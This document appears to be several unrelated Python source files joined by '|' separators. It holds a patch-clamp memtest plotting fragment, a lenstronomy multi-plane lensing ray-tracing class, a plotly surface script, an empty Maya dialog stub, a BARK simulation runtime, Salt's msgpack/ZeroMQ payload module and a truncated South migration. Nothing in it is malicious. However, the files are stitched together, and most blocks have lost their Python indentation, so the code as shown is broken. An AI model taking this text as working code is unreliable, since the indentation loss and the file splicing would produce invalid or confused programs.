pylab.plot(abf.dataX[TCB:],abf.dataY[TCB:],alpha=.2,color='k',lw=2)
pylab.plot(abf.dataX[TCA:TCB],abf.dataY[TCA:TCB],'o',alpha=.5,lw=4,mfc='none',mec='r')
pylab.plot(abf.dataX[T1A:T1B],abf.dataY[T1A:T1B],alpha=.4,color='b')
pylab.plot(abf.dataX[T2A:T2B],abf.dataY[T2A:T2B],alpha=.4,color='b')
pylab.plot(abf.dataX[TCA:TCB],fitted,color='k',lw=2,ls="--")
for i in [TA, TB]:
pylab.axvline(i/abf.rate,color='k',ls='--',alpha=.4)
for i in [P1,P2]:
pylab.axhline(i,color='b',ls="--",alpha=.5)
for i in [PCA,PCB,PP]:
pylab.axhline(i,color='g',ls="--",alpha=.5)
pylab.tight_layout()
pylab.subplots_adjust(right=0.75)
pylab.annotate(_msg,(.8,.75),ha='left',va='top',alpha=.5,
xycoords='figure fraction',family='monospace',size=10)
pylab.annotate(_msg2,(.8,.95),ha='left',va='top',weight='bold',family='monospace',
xycoords='figure fraction',size=12,color='g')
pylab.subplot(211)
pylab.axis([None,abf.dataX[T2B]+.05,None,None])
pylab.subplot(212)
pylab.axis([(TB-20)/abf.rate,(TCB+20)/abf.rate,P1-20,PP+20])
swhlab.plot.annotate(abf)
for key in _keys:
del key #be clean about screwing with globals()
return
def test():
"""voltage clamp MT."""
abf=swhlab.ABF(r'C:\Apps\pythonModules\abfs\16701010.abf')
swhlab.memtest.memtest(abf) #performs memtest on all sweeps
swhlab.memtest.checkSweep(abf) #lets you eyeball check how it did
pylab.show()
def test2():
"""current clamp MT."""
abf=swhlab.ABF(r'C:\Apps\pythonModules\abfs\16701006.abf')
swhlab.memtest.memtest(abf) #performs memtest on all sweeps
swhlab.memtest.checkSweep(abf) #lets you eyeball check how it did
pylab.show()
if __name__=="__main__":
    test()   # voltage-clamp example
    #test2() # current-clamp example
print("DONE")
|
import numpy as np
from lenstronomy.Cosmo.background import Background
from lenstronomy.LensModel.profile_list_base import ProfileListBase
import lenstronomy.Util.constants as const
__all__ = ['MultiPlaneBase']
class MultiPlaneBase(ProfileListBase):
"""
Multi-plane lensing class
The lens model deflection angles are in units of reduced deflections from the specified redshift of the lens to the
source redshift of the class instance.
"""
def __init__(self, lens_model_list, lens_redshift_list, z_source_convention, cosmo=None,
numerical_alpha_class=None, cosmo_interp=False, z_interp_stop=None, num_z_interp=100):
"""
A description of the recursive multi-plane formalism can be found e.g. here: https://arxiv.org/abs/1312.1536
:param lens_model_list: list of lens model strings
:param lens_redshift_list: list of floats with redshifts of the lens models indicated in lens_model_list
:param z_source_convention: float, redshift of a source to define the reduced deflection angles of the lens
models. If None, 'z_source' is used.
:param cosmo: instance of astropy.cosmology
:param numerical_alpha_class: an instance of a custom class for use in NumericalAlpha() lens model
(see documentation in Profiles/numerical_alpha)
"""
if z_interp_stop is None:
z_interp_stop = z_source_convention
self._cosmo_bkg = Background(cosmo, interp=cosmo_interp, z_stop=z_interp_stop, num_interp=num_z_interp)
self._z_source_convention = z_source_convention
if len(lens_redshift_list) > 0:
z_lens_max = np.max(lens_redshift_list)
if z_lens_max >= z_source_convention:
                raise ValueError('deflector redshifts higher or equal the source redshift convention (%s >= %s) for the reduced lens'
                                 ' model quantities not allowed (leads to negative reduced deflection angles!)'
                                 % (z_lens_max, z_source_convention))
if not len(lens_model_list) == len(lens_redshift_list):
raise ValueError("The length of lens_model_list does not correspond to redshift_list")
self._lens_redshift_list = lens_redshift_list
super(MultiPlaneBase, self).__init__(lens_model_list, numerical_alpha_class=numerical_alpha_class,
lens_redshift_list=lens_redshift_list,
z_source_convention=z_source_convention)
if len(lens_model_list) < 1:
self._sorted_redshift_index = []
else:
self._sorted_redshift_index = self._index_ordering(lens_redshift_list)
z_before = 0
T_z = 0
self._T_ij_list = []
self._T_z_list = []
# Sort redshift for vectorized reduced2physical factor calculation
if len(lens_model_list)<1:
self._reduced2physical_factor = []
else:
z_sort = np.array(self._lens_redshift_list)[self._sorted_redshift_index]
z_source_array = np.ones(z_sort.shape)*z_source_convention
self._reduced2physical_factor = self._cosmo_bkg.d_xy(0, z_source_convention) / self._cosmo_bkg.d_xy(z_sort, z_source_array)
for idex in self._sorted_redshift_index:
z_lens = self._lens_redshift_list[idex]
if z_before == z_lens:
delta_T = 0
else:
T_z = self._cosmo_bkg.T_xy(0, z_lens)
delta_T = self._cosmo_bkg.T_xy(z_before, z_lens)
self._T_ij_list.append(delta_T)
self._T_z_list.append(T_z)
z_before = z_lens
def ray_shooting_partial(self, x, y, alpha_x, alpha_y, z_start, z_stop, kwargs_lens,
include_z_start=False, T_ij_start=None, T_ij_end=None):
"""
ray-tracing through parts of the coin, starting with (x,y) co-moving distances and angles (alpha_x, alpha_y)
at redshift z_start and then backwards to redshift z_stop
:param x: co-moving position [Mpc]
:param y: co-moving position [Mpc]
:param alpha_x: ray angle at z_start [arcsec]
:param alpha_y: ray angle at z_start [arcsec]
:param z_start: redshift of start of computation
:param z_stop: redshift where output is computed
:param kwargs_lens: lens model keyword argument list
:param include_z_start: bool, if True, includes the computation of the deflection angle at the same redshift as
            the start of the ray-tracing. ATTENTION: deflection angles at the same redshift as z_stop will always be computed!
This can lead to duplications in the computation of deflection angles.
:param T_ij_start: transverse angular distance between the starting redshift to the first lens plane to follow.
If not set, will compute the distance each time this function gets executed.
:param T_ij_end: transverse angular distance between the last lens plane being computed and z_end.
If not set, will compute the distance each time this function gets executed.
:return: co-moving position and angles at redshift z_stop
"""
x = np.array(x, dtype=float)
y = np.array(y, dtype=float)
alpha_x = np.array(alpha_x)
alpha_y = np.array(alpha_y)
z_lens_last = z_start
first_deflector = True
for i, idex in enumerate(self._sorted_redshift_index):
z_lens = self._lens_redshift_list[idex]
if self._start_condition(include_z_start, z_lens, z_start) and z_lens <= z_stop:
if first_deflector is True:
if T_ij_start is None:
if z_start == 0:
delta_T = self._T_ij_list[0]
else:
delta_T = self._cosmo_bkg.T_xy(z_start, z_lens)
else:
delta_T = T_ij_start
first_deflector = False
else:
delta_T = self._T_ij_list[i]
x, y = self._ray_step_add(x, y, alpha_x, alpha_y, delta_T)
alpha_x, alpha_y = self._add_deflection(x, y, alpha_x, alpha_y, kwargs_lens, i)
z_lens_last = z_lens
if T_ij_end is None:
if z_lens_last == z_stop:
delta_T = 0
else:
delta_T = self._cosmo_bkg.T_xy(z_lens_last, z_stop)
else:
delta_T = T_ij_end
x, y = self._ray_step_add(x, y, alpha_x, alpha_y, delta_T)
return x, y, alpha_x, alpha_y
def transverse_distance_start_stop(self, z_start, z_stop, include_z_start=False):
"""
computes the transverse distance (T_ij) that is required by the ray-tracing between the starting redshift and
the first deflector afterwards and the last deflector before the end of the ray-tracing.
:param z_start: redshift of the start of the ray-tracing
:param z_stop: stop of ray-tracing
:param include_z_start: boolean, if True includes the computation of the starting position if the first
deflector is at z_start
:return: T_ij_start, T_ij_end
"""
z_lens_last = z_start
first_deflector = True
T_ij_start = None
for i, idex in enumerate(self._sorted_redshift_index):
z_lens = self._lens_redshift_list[idex]
if self._start_condition(include_z_start, z_lens, z_start) and z_lens <= z_stop:
if first_deflector is True:
T_ij_start = self._cosmo_bkg.T_xy(z_start, z_lens)
first_deflector = False
z_lens_last = z_lens
T_ij_end = self._cosmo_bkg.T_xy(z_lens_last, z_stop)
return T_ij_start, T_ij_end
def geo_shapiro_delay(self, theta_x, theta_y, kwargs_lens, z_stop, T_z_stop=None, T_ij_end=None):
"""
geometric and Shapiro (gravitational) light travel time relative to a straight path through the coordinate (0,0)
Negative sign means earlier arrival time
:param theta_x: angle in x-direction on the image
:param theta_y: angle in y-direction on the image
:param kwargs_lens: lens model keyword argument list
:param z_stop: redshift of the source to stop the backwards ray-tracing
:param T_z_stop: optional, transversal angular distance from z=0 to z_stop
:param T_ij_end: optional, transversal angular distance between the last lensing plane and the source plane
        :return: dt_geo, dt_grav [days]
"""
dt_grav = np.zeros_like(theta_x, dtype=float)
dt_geo = np.zeros_like(theta_x, dtype=float)
x = np.zeros_like(theta_x, dtype=float)
y = np.zeros_like(theta_y, dtype=float)
alpha_x = np.array(theta_x, dtype=float)
alpha_y = np.array(theta_y, dtype=float)
i = 0
z_lens_last = 0
for i, index in enumerate(self._sorted_redshift_index):
z_lens = self._lens_redshift_list[index]
if z_lens <= z_stop:
T_ij = self._T_ij_list[i]
x_new, y_new = self._ray_step(x, y, alpha_x, alpha_y, T_ij)
if i == 0:
pass
elif T_ij > 0:
T_j = self._T_z_list[i]
T_i = self._T_z_list[i - 1]
beta_i_x, beta_i_y = x / T_i, y / T_i
beta_j_x, beta_j_y = x_new / T_j, y_new / T_j
dt_geo_new = self._geometrical_delay(beta_i_x, beta_i_y, beta_j_x, beta_j_y, T_i, T_j, T_ij)
dt_geo += dt_geo_new
x, y = x_new, y_new
dt_grav_new = self._gravitational_delay(x, y, kwargs_lens, i, z_lens)
alpha_x, alpha_y = self._add_deflection(x, y, alpha_x, alpha_y, kwargs_lens, i)
dt_grav += dt_grav_new
z_lens_last = z_lens
if T_ij_end is None:
T_ij_end = self._cosmo_bkg.T_xy(z_lens_last, z_stop)
T_ij = T_ij_end
x_new, y_new = self._ray_step(x, y, alpha_x, alpha_y, T_ij)
if T_z_stop is None:
T_z_stop = self._cosmo_bkg.T_xy(0, z_stop)
T_j = T_z_stop
T_i = self._T_z_list[i]
beta_i_x, beta_i_y = x / T_i, y / T_i
beta_j_x, beta_j_y = x_new / T_j, y_new / T_j
dt_geo_new = self._geometrical_delay(beta_i_x, beta_i_y, beta_j_x, beta_j_y, T_i, T_j, T_ij)
dt_geo += dt_geo_new
return dt_geo, dt_grav
@staticmethod
def _index_ordering(redshift_list):
"""
:param redshift_list: list of redshifts
:return: indexes in ascending order to be evaluated (from z=0 to z=z_source)
"""
redshift_list = np.array(redshift_list)
#sort_index = np.argsort(redshift_list[redshift_list < z_source])
sort_index = np.argsort(redshift_list)
#if len(sort_index) < 1:
# Warning("There is no lens object between observer at z=0 and source at z=%s" % z_source)
return sort_index
def _reduced2physical_deflection(self, alpha_reduced, index_lens):
"""
alpha_reduced = D_ds/Ds alpha_physical
:param alpha_reduced: reduced deflection angle
:param index_lens: integer, index of the deflector plane
:return: physical deflection angle
"""
factor = self._reduced2physical_factor[index_lens]
return alpha_reduced * factor
def _gravitational_delay(self, x, y, kwargs_lens, index, z_lens):
"""
:param x: co-moving coordinate at the lens plane
:param y: co-moving coordinate at the lens plane
:param kwargs_lens: lens model keyword arguments
:param z_lens: redshift of the deflector
        :param index: index of the lens model in sorted redshift convention
:return: gravitational delay in units of days as seen at z=0
"""
theta_x, theta_y = self._co_moving2angle(x, y, index)
k = self._sorted_redshift_index[index]
potential = self.func_list[k].function(theta_x, theta_y, **kwargs_lens[k])
delay_days = self._lensing_potential2time_delay(potential, z_lens, z_source=self._z_source_convention)
return -delay_days
@staticmethod
def _geometrical_delay(beta_i_x, beta_i_y, beta_j_x, beta_j_y, T_i, T_j, T_ij):
"""
:param beta_i_x: angle on the sky at plane i
:param beta_i_y: angle on the sky at plane i
:param beta_j_x: angle on the sky at plane j
:param beta_j_y: angle on the sky at plane j
:param T_i: transverse diameter distance to z_i
:param T_j: transverse diameter distance to z_j
:param T_ij: transverse diameter distance from z_i to z_j
:return: excess delay relative to a straight line
"""
d_beta_x = beta_j_x - beta_i_x
d_beta_y = beta_j_y - beta_i_y
tau_ij = T_i * T_j / T_ij * const.Mpc / const.c / const.day_s * const.arcsec**2
return tau_ij * (d_beta_x ** 2 + d_beta_y ** 2) / 2
def _lensing_potential2time_delay(self, potential, z_lens, z_source):
"""
transforms the lensing potential (in units arcsec^2) to a gravitational time-delay as measured at z=0
:param potential: lensing potential
:param z_lens: redshift of the deflector
:param z_source: redshift of source for the definition of the lensing quantities
:return: gravitational time-delay in units of days
"""
D_dt = self._cosmo_bkg.ddt(z_lens, z_source)
delay_days = const.delay_arcsec2days(potential, D_dt)
return delay_days
def _co_moving2angle(self, x, y, index):
"""
transforms co-moving distances Mpc into angles on the sky (radian)
:param x: co-moving distance
:param y: co-moving distance
:param index: index of plane
:return: angles on the sky
"""
T_z = self._T_z_list[index]
theta_x = x / T_z
theta_y = y / T_z
return theta_x, theta_y
@staticmethod
def _ray_step(x, y, alpha_x, alpha_y, delta_T):
"""
ray propagation with small angle approximation
:param x: co-moving x-position
:param y: co-moving y-position
:param alpha_x: deflection angle in x-direction at (x, y)
:param alpha_y: deflection angle in y-direction at (x, y)
:param delta_T: transverse angular diameter distance to the next step
:return: co-moving position at the next step (backwards)
"""
x_ = x + alpha_x * delta_T
y_ = y + alpha_y * delta_T
return x_, y_
@staticmethod
def _ray_step_add(x, y, alpha_x, alpha_y, delta_T):
"""
ray propagation with small angle approximation
:param x: co-moving x-position
:param y: co-moving y-position
:param alpha_x: deflection angle in x-direction at (x, y)
:param alpha_y: deflection angle in y-direction at (x, y)
:param delta_T: transverse angular diameter distance to the next step
:return: co-moving position at the next step (backwards)
"""
x += alpha_x * delta_T
y += alpha_y * delta_T
return x, y
def _add_deflection(self, x, y, alpha_x, alpha_y, kwargs_lens, index):
"""
adds the physical deflection angle of a single lens plane to the deflection field
:param x: co-moving distance at the deflector plane
:param y: co-moving distance at the deflector plane
:param alpha_x: physical angle (radian) before the deflector plane
:param alpha_y: physical angle (radian) before the deflector plane
:param kwargs_lens: lens model parameter kwargs
:param index: index of the lens model to be added in sorted redshift list convention
:return: updated physical deflection after deflector plane (in a backwards ray-tracing perspective)
"""
theta_x, theta_y = self._co_moving2angle(x, y, index)
k = self._sorted_redshift_index[index]
alpha_x_red, alpha_y_red = self.func_list[k].derivatives(theta_x, theta_y, **kwargs_lens[k])
alpha_x_phys = self._reduced2physical_deflection(alpha_x_red, index)
alpha_y_phys = self._reduced2physical_deflection(alpha_y_red, index)
return alpha_x - alpha_x_phys, alpha_y - alpha_y_phys
@staticmethod
def _start_condition(inclusive, z_lens, z_start):
"""
:param inclusive: boolean, if True selects z_lens including z_start, else only selects z_lens > z_start
:param z_lens: deflector redshift
:param z_start: starting redshift (lowest redshift)
:return: boolean of condition
"""
if inclusive:
return z_lens >= z_start
else:
return z_lens > z_start
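if __name__ == '__main__':
    # Minimal usage sketch (added for illustration, not part of lenstronomy): it assumes
    # the default astropy cosmology (cosmo=None) and the 'SIS' profile with its
    # theta_E/center_x/center_y parameterization. A single ray is shot from the observer
    # through one deflector at z=0.5 down to a source plane at z=1.5.
    lens = MultiPlaneBase(lens_model_list=['SIS'],
                          lens_redshift_list=[0.5],
                          z_source_convention=1.5)
    kwargs_lens = [{'theta_E': 1.0, 'center_x': 0.0, 'center_y': 0.0}]
    x, y, alpha_x, alpha_y = lens.ray_shooting_partial(x=0.0, y=0.0, alpha_x=1.0, alpha_y=0.0,
                                                       z_start=0.0, z_stop=1.5,
                                                       kwargs_lens=kwargs_lens)
    print(x, y, alpha_x, alpha_y)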
|
# The Plotly^^^plotly^^^ package
import plotly
# Importing ^^^numpy^^^
import numpy
def sigmoid(x):
return (1 + numpy.exp(-x)) ** -1
samplesPerDimension = 500
# Using numpy.linspace to create the x and y values most likely comes from an example on
# ^^^plotly^^^'s website; it is a convenient way to build an evenly spaced evaluation range.
evaluationRange = numpy.linspace([-5, -5], [5, 5], samplesPerDimension, axis=1)
# Using the technique that I used from networkcomponents.py (PairwiseDifference) where one dimension
# is on the first axis and the other is on the second axis so that they can broadcast to create all
# permutations between the array of x values and the array of y values. Before broadcasting, we need
# to add a dimension to both the x vector and y vector, but at the beginning and end of them,
# respectively, which is also what happens in PairwiseDifference. However, this code doesn't
# actually broadcast, but it mimics broadcasting with the .repeat(...) calls.
####################################################################################################
# #
x = numpy.expand_dims(evaluationRange[0], 0).repeat(samplesPerDimension, 0)
y = numpy.expand_dims(evaluationRange[1], 1).repeat(samplesPerDimension, 1)
evaluationPairs = numpy.stack([x, y], 2)
# #
####################################################################################################
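# Sanity check (added for illustration): the expand_dims/repeat construction above is
# equivalent to a plain numpy.meshgrid over the same sample values.
gridX, gridY = numpy.meshgrid(evaluationRange[0], evaluationRange[1])
assert numpy.array_equal(gridX, x) and numpy.array_equal(gridY, y)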
weights = numpy.array([1, 1])
constant = 1.0
# Calculating every combination for the three functions
dotProduct = numpy.dot(evaluationPairs, weights)
cosine = dotProduct \
/ \
( numpy.linalg.norm(weights) * numpy.linalg.norm(evaluationPairs, axis=2) )
softenedCosine = dotProduct \
/ \
( numpy.linalg.norm(weights) * numpy.linalg.norm(evaluationPairs, axis=2) + constant)
dotProductSurface = plotly.graph_objects.Surface(
x=evaluationRange[0],
y=evaluationRange[1], z=sigmoid(dotProduct)
)
cosineSurface = plotly.graph_objects.Surface(
x=evaluationRange[0],
y=evaluationRange[1], z=cosine
)
softenedCosineSurface = plotly.graph_objects.Surface(
x=evaluationRange[0],
y=evaluationRange[1], z=softenedCosine
)
figure = plotly.graph_objects.Figure(
softenedCosineSurface,
layout={ "scene": { "aspectmode": "data" } }
)
# "validate" left as True partially because I trust the default value listed in
# ^^^plotlyfigureshow^^^
figure.show(renderer="firefox")
#figure.write_image("graph.png", "png", 1200, 900, 1.0, True, "kaleido")
|
import maya.mel as mel
import maya
import maya.cmds as cmds
import sys
class TselectionWin(object):
"""
Base class for a dialog which works on the user's selection
"""
def __del__(self):
pass
def __init__(self, title, selectionFilter='<function <lambda>>', objects=[]):
"""
selectionFilter - function which returns True if object is selectable
"""
pass
def activate(self, window):
"""
Call this method once the window is created
"""
pass
def close(self):
pass
def getWindowTitle(self):
pass
def onSelectionChanged(self, *args):
"""
Called anytime the selection list changes,
self.objects is updated and window title is updated.
"""
pass
__dict__ = None
__weakref__ = None
class TadjustBackgroundImageWin(TselectionWin):
"""
Adjust the background image for a container Dialog
"""
def __init__(self, editor):
pass
def hyperGraphCmd(self, *args, **kwargs):
pass
def loadImage(self, theFile):
pass
def onAdjustImagePositionHorizontal(self, val):
pass
def onAdjustImagePositionVertical(self, val):
pass
def onAdjustImageScale(self, val):
pass
def onFitToHeight(self, arg):
pass
def onFitToWidth(self, arg):
pass
def onImageFieldChange(self, val):
pass
def onLoadImage(self):
pass
def onSelectionChanged(self, *args):
"""
override selection callback
"""
pass
def show(self):
"""
Build and show the dialog
"""
pass
def update(self):
"""
update the ui after something has changed
"""
pass
def adjustBackgroundImageWin(editor):
"""
Main entry point. Create and show the adjust-background-image dialog.
"""
pass
|
# Copyright (c) 2020 Julian Bernhard, Klemens Esterle, Patrick Hart and
# Tobias Kessler
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
from bark.world.opendrive import *
from bark.world import *
from bark.geometry import *
from bark.runtime import PyRuntime
class Runtime(PyRuntime):
def __init__(self,
step_time,
viewer,
scenario_generator=None,
render=False):
self._step_time = step_time
self._viewer = viewer
self._scenario_generator = scenario_generator
self._scenario_idx = None
self._scenario = None
self._render = render
self._reset_has_been_called = False
def reset(self, scenario=None):
if scenario:
self._scenario = scenario
else:
self._scenario, self._scenario_idx = \
self._scenario_generator.get_next_scenario()
self._world = self._scenario.GetWorldState()
self._reset_has_been_called = True
self._viewer.Reset()
def step(self):
        assert self._reset_has_been_called
self._world.Step(self._step_time)
if self._render:
self.render()
def render(self):
# self._viewer.clear()
self._viewer.drawWorld(
self._world,
self._scenario._eval_agent_ids,
scenario_idx=self._scenario_idx)
self._viewer.clear()
def run(self, steps):
for step_count in range(steps):
            self.step()
|
# -*- coding: utf-8 -*-
"""
Many aspects of the salt payload need to be managed, from the return of
encrypted keys to general payload dynamics and packaging, these happen
in here
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import datetime
import gc
# import sys # Use if sys is commented out below
import logging
# Import salt libs
import salt.log
import salt.transport.frame
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.stringutils
from salt.exceptions import SaltDeserializationError, SaltReqTimeoutError
# Import third party libs
from salt.ext import six
from salt.utils.data import CaseInsensitiveDict
try:
import zmq
except ImportError:
# No need for zeromq in local mode
pass
log = logging.getLogger(__name__)
def package(payload):
"""
This method for now just wraps msgpack.dumps, but it is here so that
we can make the serialization a custom option in the future with ease.
"""
return salt.utils.msgpack.dumps(payload)
def unpackage(package_):
"""
Unpackages a payload
"""
return salt.utils.msgpack.loads(package_, use_list=True)
def format_payload(enc, **kwargs):
"""
Pass in the required arguments for a payload, the enc type and the cmd,
then a list of keyword args to generate the body of the load dict.
"""
payload = {"enc": enc}
load = {}
for key in kwargs:
load[key] = kwargs[key]
payload["load"] = load
return package(payload)
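# Illustrative round trip (added comment; the command and minion id are made up, and the
# exact str/bytes typing of the result depends on the msgpack version and flags):
#   pkg = format_payload('clear', cmd='test.ping', id='minion1')
#   unpackage(pkg)  ->  {'enc': 'clear', 'load': {'cmd': 'test.ping', 'id': 'minion1'}}
# i.e. unpackage(package(payload)) recovers the original payload dict.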
class Serial(object):
"""
Create a serialization object, this object manages all message
serialization in Salt
"""
def __init__(self, opts):
if isinstance(opts, dict):
self.serial = opts.get("serial", "msgpack")
elif isinstance(opts, six.string_types):
self.serial = opts
else:
self.serial = "msgpack"
def loads(self, msg, encoding=None, raw=False):
"""
Run the correct loads serialization format
:param encoding: Useful for Python 3 support. If the msgpack data
was encoded using "use_bin_type=True", this will
differentiate between the 'bytes' type and the
'str' type by decoding contents with 'str' type
to what the encoding was set as. Recommended
encoding is 'utf-8' when using Python 3.
If the msgpack data was not encoded using
"use_bin_type=True", it will try to decode
all 'bytes' and 'str' data (the distinction has
been lost in this case) to what the encoding is
set as. In this case, it will fail if any of
the contents cannot be converted.
"""
try:
def ext_type_decoder(code, data):
if code == 78:
data = salt.utils.stringutils.to_unicode(data)
return datetime.datetime.strptime(data, "%Y%m%dT%H:%M:%S.%f")
return data
gc.disable() # performance optimization for msgpack
loads_kwargs = {"use_list": True, "ext_hook": ext_type_decoder}
if salt.utils.msgpack.version >= (0, 4, 0):
# msgpack only supports 'encoding' starting in 0.4.0.
# Due to this, if we don't need it, don't pass it at all so
# that under Python 2 we can still work with older versions
# of msgpack.
if salt.utils.msgpack.version >= (0, 5, 2):
if encoding is None:
loads_kwargs["raw"] = True
else:
loads_kwargs["raw"] = False
else:
loads_kwargs["encoding"] = encoding
try:
ret = salt.utils.msgpack.unpackb(msg, **loads_kwargs)
except UnicodeDecodeError:
# msg contains binary data
loads_kwargs.pop("raw", None)
loads_kwargs.pop("encoding", None)
ret = salt.utils.msgpack.loads(msg, **loads_kwargs)
else:
ret = salt.utils.msgpack.loads(msg, **loads_kwargs)
if six.PY3 and encoding is None and not raw:
ret = salt.transport.frame.decode_embedded_strs(ret)
except Exception as exc: # pylint: disable=broad-except
log.critical(
"Could not deserialize msgpack message. This often happens "
"when trying to read a file not in binary mode. "
"To see message payload, enable debug logging and retry. "
"Exception: %s",
exc,
)
log.debug("Msgpack deserialization failure on message: %s", msg)
gc.collect()
raise six.raise_from(
SaltDeserializationError(
"Could not deserialize msgpack message." " See log for more info."
),
exc,
)
finally:
gc.enable()
return ret
def load(self, fn_):
"""
Run the correct serialization to load a file
"""
data = fn_.read()
fn_.close()
if data:
if six.PY3:
return self.loads(data, encoding="utf-8")
else:
return self.loads(data)
def dumps(self, msg, use_bin_type=False):
"""
Run the correct dumps serialization format
:param use_bin_type: Useful for Python 3 support. Tells msgpack to
differentiate between 'str' and 'bytes' types
by encoding them differently.
Since this changes the wire protocol, this
option should not be used outside of IPC.
"""
def ext_type_encoder(obj):
if isinstance(obj, six.integer_types):
# msgpack can't handle the very long Python longs for jids
# Convert any very long longs to strings
return six.text_type(obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
# msgpack doesn't support datetime.datetime and datetime.date datatypes.
# So here we have converted these types to custom datatype
# This is msgpack Extended types numbered 78
return salt.utils.msgpack.ExtType(
78,
salt.utils.stringutils.to_bytes(obj.strftime("%Y%m%dT%H:%M:%S.%f")),
)
# The same for immutable types
elif isinstance(obj, immutabletypes.ImmutableDict):
return dict(obj)
elif isinstance(obj, immutabletypes.ImmutableList):
return list(obj)
elif isinstance(obj, (set, immutabletypes.ImmutableSet)):
# msgpack can't handle set so translate it to tuple
return tuple(obj)
elif isinstance(obj, CaseInsensitiveDict):
return dict(obj)
# Nothing known exceptions found. Let msgpack raise its own.
return obj
try:
return salt.utils.msgpack.packb(
msg, default=ext_type_encoder, use_bin_type=use_bin_type
)
except (OverflowError, salt.utils.msgpack.exceptions.PackValueError):
            # msgpack<=0.4.6 doesn't call the ext encoder on very long integers; it raises the error instead.
# Convert any very long longs to strings and call dumps again.
def verylong_encoder(obj, context):
# Make sure we catch recursion here.
objid = id(obj)
# This instance list needs to correspond to the types recursed
# in the below if/elif chain. Also update
# tests/unit/test_payload.py
if objid in context and isinstance(obj, (dict, list, tuple)):
return "<Recursion on {} with id={}>".format(
type(obj).__name__, id(obj)
)
context.add(objid)
# The isinstance checks in this if/elif chain need to be
# kept in sync with the above recursion check.
if isinstance(obj, dict):
for key, value in six.iteritems(obj.copy()):
obj[key] = verylong_encoder(value, context)
return dict(obj)
elif isinstance(obj, (list, tuple)):
obj = list(obj)
for idx, entry in enumerate(obj):
obj[idx] = verylong_encoder(entry, context)
return obj
                # A value of an Integer object is limited from -(2^63) up to (2^64)-1 by the MessagePack
                # spec. Here we care only about JIDs that are positive integers.
if isinstance(obj, six.integer_types) and obj >= pow(2, 64):
return six.text_type(obj)
else:
return obj
msg = verylong_encoder(msg, set())
return salt.utils.msgpack.packb(
msg, default=ext_type_encoder, use_bin_type=use_bin_type
)
def dump(self, msg, fn_):
"""
Serialize the correct data into the named file object
"""
if six.PY2:
fn_.write(self.dumps(msg))
else:
# When using Python 3, write files in such a way
# that the 'bytes' and 'str' types are distinguishable
# by using "use_bin_type=True".
fn_.write(self.dumps(msg, use_bin_type=True))
fn_.close()
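# Illustrative use of Serial (added comment): on Python 3 a round trip that preserves the
# str/bytes distinction looks roughly like
#   serial = Serial('msgpack')
#   data = serial.dumps({'jid': '20211231235959', 'blob': b'\x00\x01'}, use_bin_type=True)
#   serial.loads(data, encoding='utf-8')
# which is the encoding/use_bin_type pairing described in the docstrings above.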
class SREQ(object):
"""
Create a generic interface to wrap salt zeromq req calls.
"""
def __init__(self, master, id_="", serial="msgpack", linger=0, opts=None):
self.master = master
self.id_ = id_
self.serial = Serial(serial)
self.linger = linger
self.context = zmq.Context()
self.poller = zmq.Poller()
self.opts = opts
@property
def socket(self):
"""
Lazily create the socket.
"""
if not hasattr(self, "_socket"):
# create a new one
self._socket = self.context.socket(zmq.REQ)
if hasattr(zmq, "RECONNECT_IVL_MAX"):
self._socket.setsockopt(zmq.RECONNECT_IVL_MAX, 5000)
self._set_tcp_keepalive()
if self.master.startswith("tcp://["):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, "IPV6"):
self._socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, "IPV4ONLY"):
self._socket.setsockopt(zmq.IPV4ONLY, 0)
self._socket.linger = self.linger
if self.id_:
self._socket.setsockopt(zmq.IDENTITY, self.id_)
self._socket.connect(self.master)
return self._socket
def _set_tcp_keepalive(self):
if hasattr(zmq, "TCP_KEEPALIVE") and self.opts:
if "tcp_keepalive" in self.opts:
self._socket.setsockopt(zmq.TCP_KEEPALIVE, self.opts["tcp_keepalive"])
if "tcp_keepalive_idle" in self.opts:
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts["tcp_keepalive_idle"]
)
if "tcp_keepalive_cnt" in self.opts:
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts["tcp_keepalive_cnt"]
)
if "tcp_keepalive_intvl" in self.opts:
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts["tcp_keepalive_intvl"]
)
def clear_socket(self):
"""
delete socket if you have it
"""
if hasattr(self, "_socket"):
if isinstance(self.poller.sockets, dict):
sockets = list(self.poller.sockets.keys())
for socket in sockets:
log.trace("Unregistering socket: %s", socket)
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
log.trace("Unregistering socket: %s", socket)
self.poller.unregister(socket[0])
del self._socket
def send(self, enc, load, tries=1, timeout=60):
"""
Takes two arguments, the encryption type and the base payload
"""
payload = {"enc": enc}
payload["load"] = load
pkg = self.serial.dumps(payload)
self.socket.send(pkg)
self.poller.register(self.socket, zmq.POLLIN)
tried = 0
while True:
polled = self.poller.poll(timeout * 1000)
tried += 1
if polled:
break
if tries > 1:
log.info(
"SaltReqTimeoutError: after %s seconds. (Try %s of %s)",
timeout,
tried,
tries,
)
if tried >= tries:
self.clear_socket()
raise SaltReqTimeoutError(
"SaltReqTimeoutError: after {0} seconds, ran {1} "
"tries".format(timeout * tried, tried)
)
return self.serial.loads(self.socket.recv())
def send_auto(self, payload, tries=1, timeout=60):
"""
Detect the encryption type based on the payload
"""
enc = payload.get("enc", "clear")
load = payload.get("load", {})
return self.send(enc, load, tries, timeout)
def destroy(self):
if isinstance(self.poller.sockets, dict):
sockets = list(self.poller.sockets.keys())
for socket in sockets:
if socket.closed is False:
socket.setsockopt(zmq.LINGER, 1)
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].setsockopt(zmq.LINGER, 1)
socket[0].close()
self.poller.unregister(socket[0])
if self.socket.closed is False:
self.socket.setsockopt(zmq.LINGER, 1)
self.socket.close()
if self.context.closed is False:
self.context.term()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
|
# flake8: noqa
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Enquiry.is_published'
db.add_column('enquiry_enquiry', 'is_published',
